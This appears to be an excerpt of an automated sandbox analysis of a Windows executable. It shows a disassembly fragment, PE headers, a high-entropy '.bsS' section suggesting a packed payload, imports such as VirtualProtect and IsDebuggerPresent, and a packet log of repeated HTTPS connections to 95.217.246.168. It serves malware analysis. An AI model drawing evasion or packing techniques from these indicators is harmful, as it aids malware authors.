add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F5830D0124Eh
add edx, 28h
cmp edx, esi
jne 00007F5830D0122Ch
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F5830D0123Bh
push esi
call 00007F5830D01C08h
test eax, eax
je 00007F5830D01262h
mov eax, dword ptr fs:[00000018h]
mov esi, 00430428h
mov edx, dword ptr [eax+04h]
jmp 00007F5830D01246h
cmp edx, eax
je 00007F5830D01252h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F5830D01232h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007F5830D01249h
mov byte ptr [0043042Ch], 00000001h
call 00007F5830D0143Eh
call 00007F5830D0419Bh
test al, al
jne 00007F5830D01246h
xor al, al
pop ebp
ret
call 00007F5830D0D9B7h
test al, al
jne 00007F5830D0124Ch
push 00000000h
call 00007F5830D041A2h
pop ecx
jmp 00007F5830D0122Bh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [0043042Dh], 00000000h
je 00007F5830D01246h
mov al, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2d8b4	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x66000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x67000	0x1b74	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2bd48	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2bc88	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x24000	0x158	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x21f90	0x22000	f14c05a6dca219bb2c84204cace7d040	False	0.5812198414522058	data	6.636378879087742	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.bss	0x23000	0x4ca	0x600	355aa64424dd2732643c11c454411b94	False	0.634765625	data	5.638255712365946	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x24000	0xa078	0xa200	e722625b28d12943d629020a1db746c0	False	0.43431712962962965	data	4.962724938741106	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2f000	0x1f2c	0x1000	e43a2fd03de3710737c2e6df04231506	False	0.1962890625	data	3.1279241686690304	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bsS	0x31000	0x344e4	0x34600	c3ad67a0e4deecc92c77f7a6007ad80d	False	0.996881525954654	data	7.998446862567287	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x66000	0x1e0	0x200	9a79d95a3374f8d2e86e5042f48271d7	False	0.52734375	data	4.7137725829467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x67000	0x1b74	0x1c00	1b1abb7b06860478dc660f44dafe9d9c	False	0.75	data	6.50238350002894	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x66060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

Sleep, VirtualProtect, FreeConsole, CloseHandle, WaitForSingleObjectEx, GetCurrentThreadId, GetExitCodeThread, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, QueryPerformanceCounter, ReleaseSRWLockExclusive, WakeAllConditionVariable, EncodePointer, DecodePointer, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, WriteConsoleW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, CreateThread, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, GetFileType, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, ReadConsoleW, HeapSize, CreateFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 21:35:10.364660978 CEST	49732	443	192.168.2.4	23.194.234.100
Apr 26, 2024 21:35:10.364692926 CEST	443	49732	23.194.234.100	192.168.2.4
Apr 26, 2024 21:35:10.364773989 CEST	49732	443	192.168.2.4	23.194.234.100
Apr 26, 2024 21:35:10.370883942 CEST	49732	443	192.168.2.4	23.194.234.100
Apr 26, 2024 21:35:10.370907068 CEST	443	49732	23.194.234.100	192.168.2.4
Apr 26, 2024 21:35:10.636223078 CEST	443	49732	23.194.234.100	192.168.2.4
Apr 26, 2024 21:35:10.636430979 CEST	49732	443	192.168.2.4	23.194.234.100
Apr 26, 2024 21:35:10.688880920 CEST	49732	443	192.168.2.4	23.194.234.100
Apr 26, 2024 21:35:10.688908100 CEST	443	49732	23.194.234.100	192.168.2.4
Apr 26, 2024 21:35:10.689328909 CEST	443	49732	23.194.234.100	192.168.2.4
Apr 26, 2024 21:35:10.689390898 CEST	49732	443	192.168.2.4	23.194.234.100
Apr 26, 2024 21:35:10.692854881 CEST	49732	443	192.168.2.4	23.194.234.100
Apr 26, 2024 21:35:10.740120888 CEST	443	49732	23.194.234.100	192.168.2.4
Apr 26, 2024 21:35:11.085979939 CEST	443	49732	23.194.234.100	192.168.2.4
Apr 26, 2024 21:35:11.086004972 CEST	443	49732	23.194.234.100	192.168.2.4
Apr 26, 2024 21:35:11.086081982 CEST	443	49732	23.194.234.100	192.168.2.4
Apr 26, 2024 21:35:11.086105108 CEST	49732	443	192.168.2.4	23.194.234.100
Apr 26, 2024 21:35:11.086105108 CEST	49732	443	192.168.2.4	23.194.234.100
Apr 26, 2024 21:35:11.086119890 CEST	443	49732	23.194.234.100	192.168.2.4
Apr 26, 2024 21:35:11.086136103 CEST	49732	443	192.168.2.4	23.194.234.100
Apr 26, 2024 21:35:11.086162090 CEST	49732	443	192.168.2.4	23.194.234.100
Apr 26, 2024 21:35:11.208225965 CEST	443	49732	23.194.234.100	192.168.2.4
Apr 26, 2024 21:35:11.208277941 CEST	443	49732	23.194.234.100	192.168.2.4
Apr 26, 2024 21:35:11.208304882 CEST	49732	443	192.168.2.4	23.194.234.100
Apr 26, 2024 21:35:11.208319902 CEST	443	49732	23.194.234.100	192.168.2.4
Apr 26, 2024 21:35:11.208348989 CEST	49732	443	192.168.2.4	23.194.234.100
Apr 26, 2024 21:35:11.208369017 CEST	49732	443	192.168.2.4	23.194.234.100
Apr 26, 2024 21:35:11.229999065 CEST	443	49732	23.194.234.100	192.168.2.4
Apr 26, 2024 21:35:11.230087996 CEST	443	49732	23.194.234.100	192.168.2.4
Apr 26, 2024 21:35:11.230092049 CEST	49732	443	192.168.2.4	23.194.234.100
Apr 26, 2024 21:35:11.230142117 CEST	49732	443	192.168.2.4	23.194.234.100
Apr 26, 2024 21:35:11.237000942 CEST	49732	443	192.168.2.4	23.194.234.100
Apr 26, 2024 21:35:11.237021923 CEST	443	49732	23.194.234.100	192.168.2.4
Apr 26, 2024 21:35:12.595352888 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:12.595432997 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:12.595524073 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:12.595911026 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:12.595943928 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:13.420628071 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:13.420758963 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:13.428474903 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:13.428502083 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:13.428862095 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:13.428925991 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:13.430648088 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:13.476123095 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:14.021433115 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:14.021527052 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:14.021578074 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:14.021677017 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:14.024184942 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:14.024203062 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:14.026492119 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:14.026541948 CEST	443	49734	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:14.026626110 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:14.026884079 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:14.026902914 CEST	443	49734	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:14.578959942 CEST	443	49734	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:14.579029083 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:14.584480047 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:14.584490061 CEST	443	49734	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:14.586493969 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:14.586498976 CEST	443	49734	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:15.544501066 CEST	443	49734	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:15.544579029 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:15.544594049 CEST	443	49734	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:15.544605017 CEST	443	49734	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:15.544647932 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:15.544737101 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:15.544749022 CEST	443	49734	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:15.546097994 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:15.546139956 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:15.546224117 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:15.546427965 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:15.546444893 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:16.085359097 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:16.085557938 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:17.236134052 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:17.236155987 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:17.237802029 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:17.237826109 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:18.135190010 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:18.135221958 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:18.135252953 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:18.135282040 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:18.135293961 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:18.135296106 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:18.135319948 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:18.135344028 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:18.135674953 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:18.135689020 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:18.137696028 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:18.137733936 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:18.137799978 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:18.138026953 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:18.138039112 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:18.669416904 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:18.669523001 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:18.670156956 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:18.670176029 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:18.671818018 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:18.671823025 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:19.596244097 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:19.596267939 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:19.596334934 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:19.596380949 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:19.596415043 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:19.596826077 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:19.596844912 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:19.662494898 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:19.662517071 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:19.662633896 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:19.662899971 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:19.662914038 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:20.189013004 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:20.189152002 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:20.189620972 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:20.189634085 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:20.191337109 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:20.191344976 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:20.191411018 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:20.191427946 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:20.669135094 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:20.669162035 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:20.669285059 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:20.669737101 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:20.669748068 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:21.164850950 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:21.164936066 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:21.164964914 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:21.164999962 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:21.166310072 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:21.166340113 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:21.201281071 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:21.201392889 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:21.201900005 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:21.201910019 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:21.204341888 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:21.204349995 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.042306900 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.042388916 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.042447090 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.042471886 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.042471886 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.042484045 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.042519093 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.042579889 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.159801006 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.159827948 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.159930944 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.159950018 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.159977913 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.159992933 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.340437889 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.340459108 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.340569973 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.340588093 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.340687990 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.450402021 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.450421095 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.450510025 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.450541019 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.450627089 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.545197964 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.545217037 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.545408964 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.545423031 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.545479059 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.613853931 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.613878012 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.614111900 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.614124060 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.614228964 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.659089088 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.659118891 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.659250021 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.659260035 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.659548044 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.716013908 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.716034889 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.716180086 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.716195107 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.716238022 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.767592907 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.767611980 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.767669916 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.767679930 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.767690897 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.767736912 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.814829111 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.814851999 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.814913988 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.814932108 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.814961910 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.814975023 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.860796928 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.860821009 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.861012936 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.861027002 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.861073971 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.886281013 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.886301994 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.886571884 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.886605024 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.886652946 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.917855024 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.917874098 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.918184042 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.918209076 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.918253899 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.942380905 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.942404032 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.942483902 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.942507029 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.942645073 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.967161894 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.967180014 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.967309952 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.967334032 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.967374086 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.988739014 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.988755941 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.988852978 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:22.988878965 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:22.988923073 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.011420965 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.011442900 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.011559010 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.011579990 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.011643887 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.034451962 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.034471989 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.034571886 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.034596920 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.034745932 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.055334091 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.055351973 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.055434942 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.055454969 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.055490971 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.073147058 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.073164940 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.073283911 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.073292971 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.073338032 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.091133118 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.091150999 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.091223001 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.091231108 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.091273069 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.110527039 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.110544920 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.110624075 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.110631943 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.110676050 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.132524967 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.132540941 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.132618904 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.132626057 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.132667065 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.147977114 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.148005009 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.148072958 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.148083925 CEST	443	49738	95.217.246.168	192.168.2.4
